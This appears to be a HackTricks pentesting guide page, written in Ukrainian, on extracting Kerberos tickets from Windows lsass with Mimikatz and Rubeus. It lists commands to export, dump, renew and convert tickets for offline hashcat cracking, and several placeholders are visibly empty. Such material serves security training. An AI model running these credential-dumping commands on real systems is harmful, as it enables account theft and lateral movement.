# Harvesting tickets from Windows {{#include ../../banners/hacktricks-training.md}} Квитки в Windows управляються та зберігаються процесом **lsass** (Служба підсистеми локальної безпеки), який відповідає за обробку політик безпеки. Щоб витягти ці квитки, необхідно взаємодіяти з процесом lsass. Користувач без адміністративних прав може отримати доступ лише до своїх власних квитків, тоді як адміністратор має привілей витягувати всі квитки в системі. Для таких операцій широко використовуються інструменти **Mimikatz** та **Rubeus**, кожен з яких пропонує різні команди та функціональність. ### Mimikatz Mimikatz - це універсальний інструмент, який може взаємодіяти з безпекою Windows. Його використовують не лише для витягування квитків, але й для різних інших операцій, пов'язаних з безпекою. ```bash # Extracting tickets using Mimikatz sekurlsa::tickets /export ``` ### Rubeus Rubeus - це інструмент, спеціально розроблений для взаємодії та маніпуляцій з Kerberos. Він використовується для витягування та обробки квитків, а також для інших діяльностей, пов'язаних з Kerberos. ```bash # Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid: /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) # Renewing a ticket .\Rubeus.exe renew /ticket: # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket: ``` Коли ви використовуєте ці команди, переконайтеся, що ви замінили заповнювачі, такі як `` та ``, на фактичний квиток, закодований у Base64, та ідентифікатор входу відповідно. Ці інструменти надають розширену функціональність для управління квитками та взаємодії з механізмами безпеки Windows. ## References - [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) {{#include ../../banners/hacktricks-training.md}}